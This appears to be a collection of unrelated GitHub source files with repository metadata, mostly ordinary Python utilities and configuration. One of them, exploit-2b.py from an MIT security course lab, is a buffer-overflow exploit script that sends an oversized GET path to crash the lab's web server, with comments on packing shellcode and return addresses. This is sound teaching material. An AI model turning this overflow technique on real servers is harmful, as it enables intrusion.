| text | meta |
|---|---|
import setuptools
# In Python < 2.7.4, lazy loading of the `pbr` package will break
# setuptools if some other modules registered functions in `atexit`.
# Solution from: http://bugs.python.org/issue15881#msg170215
try:
import multiprocessing # noqa
except ImportError:
pass
setuptools.setup(
setup_requires=['pbr'],
pbr=True)
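# pbr pulls the actual package metadata out of setup.cfg rather than from
# arguments to setup(). A minimal, purely illustrative setup.cfg (not part of
# this file) that pbr would understand looks roughly like:
#
#   [metadata]
#   name = example-package
#   summary = One-line description of the package
#   author = Example Author
#
#   [files]
#   packages =
#       example_package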
| {
"content_hash": "436a183f6cc62863024f5100c044ce9d",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 68,
"avg_line_length": 26.384615384615383,
"alnum_prop": 0.7288629737609329,
"repo_name": "sand8080/python-sketches",
"id": "afe4430c30270d1ebaf9e2b662ed05a796d2d3e6",
"size": "958",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8833"
}
],
"symlink_target": ""
} |
import collections
from oslo_config import cfg
import psutil
import six
from six.moves.urllib import parse
import yaml
from spectrometer.openstack.common import log as logging
from spectrometer.processor import config
from spectrometer.processor import default_data_processor
from spectrometer.processor import mls
from spectrometer.processor import mps
from spectrometer.processor import rcs
from spectrometer.processor import record_processor
from spectrometer.processor import runtime_storage
from spectrometer.processor import utils
from spectrometer.processor import vcs
LOG = logging.getLogger(__name__)
def get_pids():
# needs to be compatible with psutil >= 1.1.1 since it's a global req.
PSUTIL2 = psutil.version_info >= (2, 0)
result = set([])
for pid in psutil.get_pid_list():
try:
p = psutil.Process(pid)
name = p.name() if PSUTIL2 else p.name
if name == 'uwsgi':
LOG.debug('Found uwsgi process, pid: %s', pid)
result.add(pid)
except Exception as e:
LOG.debug('Exception while iterating process list: %s', e)
return result
def update_pids(runtime_storage):
pids = get_pids()
if not pids:
return
runtime_storage.active_pids(pids)
def _merge_commits(original, new):
if new['branches'] < original['branches']:
return False
else:
original['branches'] |= new['branches']
return True
def _record_typer(record_iterator, record_type):
for record in record_iterator:
record['record_type'] = record_type
yield record
def process_repo(repo, runtime_storage_inst, record_processor_inst):
uri = repo['uri']
    LOG.debug('Processing repo uri %s', uri)
vcs_inst = vcs.get_vcs(repo, cfg.CONF.sources_root)
vcs_inst.fetch()
rcs_inst = rcs.get_rcs(repo, cfg.CONF.review_uri)
rcs_inst.setup(key_filename=cfg.CONF.ssh_key_filename,
username=cfg.CONF.ssh_username)
branches = set(['master'])
    for release in repo.get('releases', []):
if 'branch' in release:
branches.add(release['branch'])
for branch in branches:
LOG.debug('Processing repo %s, branch %s', uri, branch)
vcs_key = 'vcs:' + str(parse.quote_plus(uri) + ':' + branch)
last_id = runtime_storage_inst.get_by_key(vcs_key)
commit_iterator = vcs_inst.log(branch, last_id)
commit_iterator_typed = _record_typer(commit_iterator, 'commit')
processed_commit_iterator = record_processor_inst.process(
commit_iterator_typed)
runtime_storage_inst.set_records(
processed_commit_iterator, _merge_commits)
last_id = vcs_inst.get_last_id(branch)
runtime_storage_inst.set_by_key(vcs_key, last_id)
LOG.debug('Processing reviews for repo %s, branch %s', uri, branch)
rcs_key = 'rcs:' + str(parse.quote_plus(uri) + ':' + branch)
last_id = runtime_storage_inst.get_by_key(rcs_key)
review_iterator = rcs_inst.log(branch, last_id)
review_iterator_typed = _record_typer(review_iterator, 'review')
processed_review_iterator = record_processor_inst.process(
review_iterator_typed)
runtime_storage_inst.set_records(processed_review_iterator,
utils.merge_records)
last_id = rcs_inst.get_last_id(branch)
runtime_storage_inst.set_by_key(rcs_key, last_id)
def process_mail_list(uri, runtime_storage_inst, record_processor_inst):
mail_iterator = mls.log(uri, runtime_storage_inst)
mail_iterator_typed = _record_typer(mail_iterator, 'email')
processed_mail_iterator = record_processor_inst.process(
mail_iterator_typed)
runtime_storage_inst.set_records(processed_mail_iterator)
def process_member_list(uri, runtime_storage_inst, record_processor_inst):
mps_inst = mps.get_mps(uri)
member_iterator = mps_inst.log(uri, runtime_storage_inst,
cfg.CONF.days_to_update_members)
member_iterator_typed = _record_typer(member_iterator, 'member')
processed_member_iterator = record_processor_inst.process(
member_iterator_typed)
runtime_storage_inst.set_records(processed_member_iterator)
def update_members(runtime_storage_inst, record_processor_inst):
member_lists = runtime_storage_inst.get_by_key('member_lists') or []
for member_list in member_lists:
process_member_list(member_list, runtime_storage_inst,
record_processor_inst)
def update_records(runtime_storage_inst, record_processor_inst):
repos = utils.load_repos(runtime_storage_inst)
    # Process the code repositories
for repo in repos:
process_repo(repo, runtime_storage_inst, record_processor_inst)
mail_lists = runtime_storage_inst.get_by_key('mail_lists') or []
for mail_list in mail_lists:
process_mail_list(mail_list, runtime_storage_inst,
record_processor_inst)
record_processor_inst.update()
def apply_corrections(uri, runtime_storage_inst):
LOG.info('Applying corrections from uri %s', uri)
corrections = utils.read_json_from_uri(uri)
if not corrections:
LOG.error('Unable to read corrections from uri: %s', uri)
return
valid_corrections = []
for c in corrections['corrections']:
if 'primary_key' in c:
valid_corrections.append(c)
else:
            LOG.warning('Correction is missing a primary key: %s', c)
runtime_storage_inst.apply_corrections(valid_corrections)
def _read_official_programs_yaml(program_list_uri, release_names):
LOG.debug('Process list of programs from uri: %s', program_list_uri)
content = yaml.safe_load(utils.read_uri(program_list_uri))
module_groups = collections.defaultdict(
lambda: {'modules': [], 'releases': collections.defaultdict(list)})
bootstrap = module_groups['official-bootstrap']
bootstrap['tag'] = 'project_type'
bootstrap['module_group_name'] = 'official-bootstrap'
incubation = module_groups['official-incubation']
incubation['tag'] = 'project_type'
incubation['module_group_name'] = 'official-incubation'
mature = module_groups['official-mature']
mature['tag'] = 'project_type'
mature['module_group_name'] = 'official-mature'
core = module_groups['official-core']
core['tag'] = 'project_type'
core['module_group_name'] = 'official-core'
RELEASE_TAGS = ['bootstrapped-since', 'incubated-since',
'mature-since', 'core-since']
for name, info in six.iteritems(content):
# for one program
group_id = name.lower()
if 'codename' in info:
name = '%s (%s)' % (info['codename'], name)
group_id = '%s-group' % info['codename'].lower()
module_groups[group_id]['module_group_name'] = name
module_groups[group_id]['tag'] = 'program'
for module in info['projects']:
module_name = module['repo'].split('/')[1]
module_groups[group_id]['modules'].append(module_name)
project_type = 'official-other'
if (any(key in module for key in RELEASE_TAGS)):
releases = [r.lower() for r in release_names]
for release_name in releases:
if release_name == module.get('bootstrapped-since'):
project_type = 'official-bootstrap'
elif release_name == module.get('incubated-since'):
project_type = 'official-incubation'
elif release_name == module.get('mature-since'):
project_type = 'official-mature'
elif release_name == module.get('core-since'):
project_type = 'official-core'
module_groups[project_type]['releases'][
release_name].append(module_name)
else:
module_groups['other']['modules'].append(module_name)
# set ids for module groups
for group_id, group in six.iteritems(module_groups):
group['id'] = group_id
return module_groups
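# For reference, an illustrative programs.yaml fragment that the parser above
# would accept (the program name, codename, repos and release tag are made up
# for the example):
#
#   Compute:
#     codename: nova
#     projects:
#       - repo: openstack/nova
#         incubated-since: diablo
#       - repo: openstack/python-novaclient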
def process_program_list(runtime_storage_inst, program_list_uri):
module_groups = runtime_storage_inst.get_by_key('module_groups') or {}
release_names = [r['release_name'].lower()
for r in runtime_storage_inst.get_by_key('releases')[1:]]
official_module_groups = _read_official_programs_yaml(
program_list_uri, release_names)
LOG.debug('Update module groups with official: %s', official_module_groups)
module_groups.update(official_module_groups)
# register modules as module groups
repos = runtime_storage_inst.get_by_key('repos') or []
for repo in repos:
module = repo['module']
module_groups[module] = utils.make_module_group(module, tag='module')
# register module 'unknown' - used for emails not mapped to any module
module_groups['unknown'] = utils.make_module_group('unknown', tag='module')
runtime_storage_inst.set_by_key('module_groups', module_groups)
def main():
# init conf and logging
conf = cfg.CONF
conf.register_cli_opts(config.OPTS)
conf.register_opts(config.OPTS)
conf()
logging.setup('spectrometer')
LOG.info('Logging enabled')
runtime_storage_inst = runtime_storage.get_runtime_storage(
cfg.CONF.runtime_storage_uri)
default_data = utils.read_json_from_uri(cfg.CONF.default_data_uri)
if not default_data:
LOG.critical('Unable to load default data')
        return 1
default_data_processor.process(runtime_storage_inst,
default_data,
cfg.CONF.sources_root,
cfg.CONF.force_update)
process_program_list(runtime_storage_inst, cfg.CONF.program_list_uri)
update_pids(runtime_storage_inst)
record_processor_inst = record_processor.RecordProcessor(
runtime_storage_inst)
update_records(runtime_storage_inst, record_processor_inst)
apply_corrections(cfg.CONF.corrections_uri, runtime_storage_inst)
# long operation should be the last
update_members(runtime_storage_inst, record_processor_inst)
runtime_storage_inst.set_by_key('runtime_storage_update_time',
utils.date_to_timestamp('now'))
if __name__ == '__main__':
main()
| {
"content_hash": "b305be495c16b5437b53b308c465c6d3",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 79,
"avg_line_length": 36.04109589041096,
"alnum_prop": 0.6375902698593691,
"repo_name": "dave-tucker/spectrometer",
"id": "501142e634d6da498b63ffad0fc49dd9b941cf81",
"size": "11106",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "spectrometer/processor/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "40267"
},
{
"name": "HTML",
"bytes": "89315"
},
{
"name": "JavaScript",
"bytes": "62950"
},
{
"name": "Pascal",
"bytes": "104"
},
{
"name": "Puppet",
"bytes": "25860"
},
{
"name": "Python",
"bytes": "301595"
},
{
"name": "Ruby",
"bytes": "220661"
},
{
"name": "Shell",
"bytes": "3005"
}
],
"symlink_target": ""
} |
"""Starters declarations.
"""
| {
"content_hash": "cc420409eaa6c74d73e6c15c3b2e5dc0",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 25,
"avg_line_length": 10.333333333333334,
"alnum_prop": 0.6451612903225806,
"repo_name": "Ecpy/ecpy",
"id": "df1b507a3d32e7ce2bd7c0a548767ec24f6fbdc5",
"size": "414",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exopy/instruments/starters/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "162"
},
{
"name": "Python",
"bytes": "1344669"
},
{
"name": "Shell",
"bytes": "420"
}
],
"symlink_target": ""
} |
import ast
import eventlet
import random
import six
from oslo_log import log as logging
from heat.common import exception
from heat.objects import sync_point as sync_point_object
LOG = logging.getLogger(__name__)
KEY_SEPERATOR = ':'
def _dump_list(items, separator=', '):
return separator.join(map(str, items))
def make_key(*components):
assert len(components) >= 2
return _dump_list(components, KEY_SEPERATOR)
def create(context, entity_id, traversal_id, is_update, stack_id):
"""Creates a sync point entry in DB."""
values = {'entity_id': entity_id, 'traversal_id': traversal_id,
'is_update': is_update, 'atomic_key': 0,
'stack_id': stack_id, 'input_data': {}}
return sync_point_object.SyncPoint.create(context, values)
def get(context, entity_id, traversal_id, is_update):
"""Retrieves a sync point entry from DB."""
sync_point = sync_point_object.SyncPoint.get_by_key(context, entity_id,
traversal_id,
is_update)
if sync_point is None:
key = (entity_id, traversal_id, is_update)
raise exception.EntityNotFound(entity='Sync Point', name=key)
return sync_point
def delete_all(context, stack_id, traversal_id):
"""Deletes all sync points of a stack associated with a traversal_id."""
return sync_point_object.SyncPoint.delete_all_by_stack_and_traversal(
context, stack_id, traversal_id
)
def update_input_data(context, entity_id, current_traversal,
is_update, atomic_key, input_data):
rows_updated = sync_point_object.SyncPoint.update_input_data(
context, entity_id, current_traversal, is_update, atomic_key,
input_data)
return rows_updated
def _str_pack_tuple(t):
return u'tuple:' + str(t)
def _str_unpack_tuple(s):
s = s[s.index(':') + 1:]
return ast.literal_eval(s)
def _deserialize(d):
d2 = {}
for k, v in d.items():
if isinstance(k, six.string_types) and k.startswith(u'tuple:('):
k = _str_unpack_tuple(k)
if isinstance(v, dict):
v = _deserialize(v)
d2[k] = v
return d2
def _serialize(d):
d2 = {}
for k, v in d.items():
if isinstance(k, tuple):
k = _str_pack_tuple(k)
if isinstance(v, dict):
v = _serialize(v)
d2[k] = v
return d2
def deserialize_input_data(db_input_data):
db_input_data = db_input_data.get('input_data')
if not db_input_data:
return {}
return dict(_deserialize(db_input_data))
def serialize_input_data(input_data):
return {'input_data': _serialize(input_data)}
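# Illustrative round-trip through the helpers above; the entity name and key
# are made up and only document the tuple-key packing:
#
#   >>> data = {('resource', 1): {'attr': 'value'}}
#   >>> packed = serialize_input_data(data)
#   >>> packed['input_data']
#   {"tuple:('resource', 1)": {'attr': 'value'}}
#   >>> deserialize_input_data(packed) == data
#   True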
def sync(cnxt, entity_id, current_traversal, is_update, propagate,
predecessors, new_data):
rows_updated = None
sync_point = None
input_data = None
nconflicts = max(0, len(predecessors) - 2)
# limit to 10 seconds
max_wt = min(nconflicts * 0.01, 10)
while not rows_updated:
sync_point = get(cnxt, entity_id, current_traversal, is_update)
input_data = deserialize_input_data(sync_point.input_data)
input_data.update(new_data)
rows_updated = update_input_data(
cnxt, entity_id, current_traversal, is_update,
sync_point.atomic_key, serialize_input_data(input_data))
# don't aggressively spin; induce some sleep
if not rows_updated:
eventlet.sleep(random.uniform(0, max_wt))
waiting = predecessors - set(input_data)
key = make_key(entity_id, current_traversal, is_update)
if waiting:
LOG.debug('[%s] Waiting %s: Got %s; still need %s',
key, entity_id, _dump_list(input_data), _dump_list(waiting))
else:
LOG.debug('[%s] Ready %s: Got %s',
key, entity_id, _dump_list(input_data))
propagate(entity_id, serialize_input_data(input_data))
| {
"content_hash": "52bd9df970122debb94fcdca9f32396c",
"timestamp": "",
"source": "github",
"line_count": 132,
"max_line_length": 78,
"avg_line_length": 30.015151515151516,
"alnum_prop": 0.6110550227158001,
"repo_name": "cwolferh/heat-scratch",
"id": "56f08d614c21d2be6fd0dc68556e040621713c3c",
"size": "4510",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heat/engine/sync_point.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8338769"
},
{
"name": "Shell",
"bytes": "56516"
}
],
"symlink_target": ""
} |
import json
import requests
class ASearch:
def __init__(self, settings):
self.settings = settings
def character(self, term, page = 1, perpage = 3):
"""
Search for a character by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: Which page are we requesting? Starts at 1.
:param perpage int: How many results per page are we requesting?
        :return: Parsed JSON response with the returned results, or None if parsing fails.
        :rtype: dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
characters (search: $query) {
id
name {
first
last
}
image {
large
}
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def anime(self, term, page = 1, perpage = 3):
"""
Search for an anime by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: Which page are we requesting? starts at 1.
:param perpage int: How many results per page? defaults to 3.
:return: List of dictionaries which are anime objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
media (search: $query, type: ANIME) {
id
title {
romaji
english
}
coverImage {
large
}
averageScore
popularity
episodes
season
hashtag
isAdult
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def manga(self, term, page = 1, perpage = 3):
"""
Search for a manga by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: Which page are we requesting? Starts at 1.
:param perpage int: How many results per page? defaults to 3.
:return: List of dictionaries which are manga objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
media (search: $query, type: MANGA) {
id
title {
romaji
english
}
coverImage {
large
}
averageScore
popularity
chapters
volumes
season
hashtag
isAdult
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def staff(self, term, page = 1, perpage = 3):
"""
Search for staff by term. Staff means actors, directors, etc.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: What page are we requesting? Starts at 1.
:param perpage int: How many results per page? Defaults to 3.
:return: List of dictionaries which are staff objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
staff (search: $query) {
id
name {
first
last
}
image {
large
}
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
def studio(self, term, page = 1, perpage = 3):
"""
Search for a studio by term.
Results are paginated by default. Page specifies which page we're on.
Perpage specifies how many per page to request. 3 is just the example from the API docs.
:param term str: Name to search by
:param page int: What page are we requesting? starts at 1.
:param perpage int: How many results per page? defaults to 3.
:return: List of dictionaries which are studio objects or None
:rtype: list of dict or NoneType
"""
query_string = """\
query ($query: String, $page: Int, $perpage: Int) {
Page (page: $page, perPage: $perpage) {
pageInfo {
total
currentPage
lastPage
hasNextPage
}
studios (search: $query) {
id
name
}
}
}
"""
vars = {"query": term, "page": page, "perpage": perpage}
r = requests.post(self.settings['apiurl'],
headers=self.settings['header'],
json={'query': query_string, 'variables': vars})
jsd = r.text
try:
jsd = json.loads(jsd)
except ValueError:
return None
else:
return jsd
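# Illustrative usage of the class above. The 'apiurl' and 'header' settings
# keys are assumptions about what the surrounding PyMoe code passes in:
#
#   searcher = ASearch({'apiurl': 'https://graphql.anilist.co',
#                       'header': {'Content-Type': 'application/json',
#                                  'Accept': 'application/json'}})
#   results = searcher.anime('Cowboy Bebop')
#   if results:
#       for show in results['data']['Page']['media']:
#           print(show['title']['romaji'])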
| {
"content_hash": "d2b918e2226d0496103e5b1e3e81d472",
"timestamp": "",
"source": "github",
"line_count": 249,
"max_line_length": 96,
"avg_line_length": 35.859437751004016,
"alnum_prop": 0.42591555605330944,
"repo_name": "ccubed/PyMoe",
"id": "b31340fd1330f7dc74d6deb57b4a07394ab471c1",
"size": "8929",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Pymoe/Anilist/search.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "106985"
}
],
"symlink_target": ""
} |
class Stack(object):
def __init__(self):
#@initialize the Data structure
self.items = []
def isEmpty(self):
#@rtype: boolean
return self.items == []
def push(self,item):
#@type item:int
#@rtype: void
self.items.append(item)
def pop(self):
#@rtype: int
return self.items.pop()
def peek(self):
#@rtype:int
        return self.items[-1]
def size(self):
#@rtype: int
return len(self.items)
if __name__ == "__main__":
obj = Stack()
print("obj is initialized as: ",obj.items)
obj.push(1)
obj.push(9)
obj.push(5)
obj.push(16)
obj.push(3)
print("After several pushes: ",obj.items)
print("Now is empty? ",obj.isEmpty())
print("Now the peek is: ",obj.peek())
print("the size is:", obj.size())
obj.pop()
obj.pop()
print("After several pushes: ",obj.items)
print("Now is empty? ",obj.isEmpty())
print("Now the peek is: ",obj.peek())
print("the size is:", obj.size())
| {
"content_hash": "24da9a03ce4c4aae7d000944dfbf3c64",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 46,
"avg_line_length": 23.133333333333333,
"alnum_prop": 0.5581171950048031,
"repo_name": "rush2catch/algorithms-leetcode",
"id": "79b4bbd6695d02801a79939cbb5b21d764f08b69",
"size": "1727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Basic Data Structures/stack/stack.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "162421"
}
],
"symlink_target": ""
} |
from exceptions import Exception
__doc__ = """
Various exception classes, nothing much to see here. move along...
"""
class LoginException(Exception):
pass
class MissingException(Exception):
pass
class MissingProperty(MissingException):
pass
class MissingClientUser(MissingException):
pass
class MissingClientProfile(MissingException):
pass
class MissingACLProfileException(MissingException):
pass
| {
"content_hash": "edad446fac23666f8d36add567a17a53",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 66,
"avg_line_length": 15,
"alnum_prop": 0.7540229885057471,
"repo_name": "unixunion/python-libsolace",
"id": "ad590d8a74b9ecd842677db3cc5e22b4398b48a3",
"size": "435",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libsolace/Exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "8090"
},
{
"name": "Python",
"bytes": "400777"
},
{
"name": "Shell",
"bytes": "745"
}
],
"symlink_target": ""
} |
import sys
import socket
import traceback
import urllib
import struct
####
## You might find it useful to define variables that store various
## stack or function addresses from the zookd / zookfs processes,
## which you can then use in build_exploit(); the following are just
## examples.
stack_buffer = 0x34567890
stack_saved_ebp = 0x12345678
stack_retaddr = stack_saved_ebp + 4
## This is the function that you should modify to construct an
## HTTP request that will cause a buffer overflow in some part
## of the zookws web server and exploit it.
def build_exploit(shellcode):
## Things that you might find useful in constructing your exploit:
## urllib.quote(s)
## returns string s with "special" characters percent-encoded
## struct.pack("<I", x)
## returns the 4-byte binary encoding of the 32-bit integer x
## variables for program addresses (ebp, buffer, retaddr=ebp+4)
path = "/" + '0'*1025;
req = "GET "+ path +" HTTP/1.0\r\n" + \
"\r\n"
return req
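# Sketch of how the helpers named in the comments above are typically combined
# once the real addresses are known (purely illustrative; assumes the saved
# return address sits above the vulnerable buffer and that the shellcode fits
# in the gap):
#
#   payload = (shellcode
#              + 'A' * (stack_retaddr - stack_buffer - len(shellcode))
#              + struct.pack("<I", stack_buffer))
#   path = "/" + urllib.quote(payload)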
####
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
####
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
| {
"content_hash": "ceabe220c85d3b58bb9041d90cbcf90c",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 70,
"avg_line_length": 25.7027027027027,
"alnum_prop": 0.6456361724500526,
"repo_name": "Kaffa-MY/mit6.858Fall2014",
"id": "054b41eac5333e92a0a84b63fc7915137df4ef2b",
"size": "1920",
"binary": false,
"copies": "1",
"ref": "refs/heads/lab1",
"path": "exploit-2b.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "767"
},
{
"name": "C",
"bytes": "24870"
},
{
"name": "CSS",
"bytes": "1117"
},
{
"name": "HTML",
"bytes": "5989"
},
{
"name": "JavaScript",
"bytes": "169"
},
{
"name": "Makefile",
"bytes": "2329"
},
{
"name": "Python",
"bytes": "31926"
},
{
"name": "Shell",
"bytes": "2595"
},
{
"name": "VimL",
"bytes": "148"
}
],
"symlink_target": ""
} |
import sys
import os
import shlex
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.ifconfig',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'atmospy'
copyright = u'2016, David H Hagan'
author = u'David H Hagan'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
#version = u'0.1.0'
# The full version, including alpha/beta/rc tags.
#release = u'0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
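# sphinx_rtd_theme is imported at the top of this file; switching to it would
# look roughly like the following commented-out sketch (not enabled here).
#html_theme = 'sphinx_rtd_theme'
#html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]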
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'atmospydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'atmospy.tex', u'atmospy Documentation',
u'David H Hagan', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
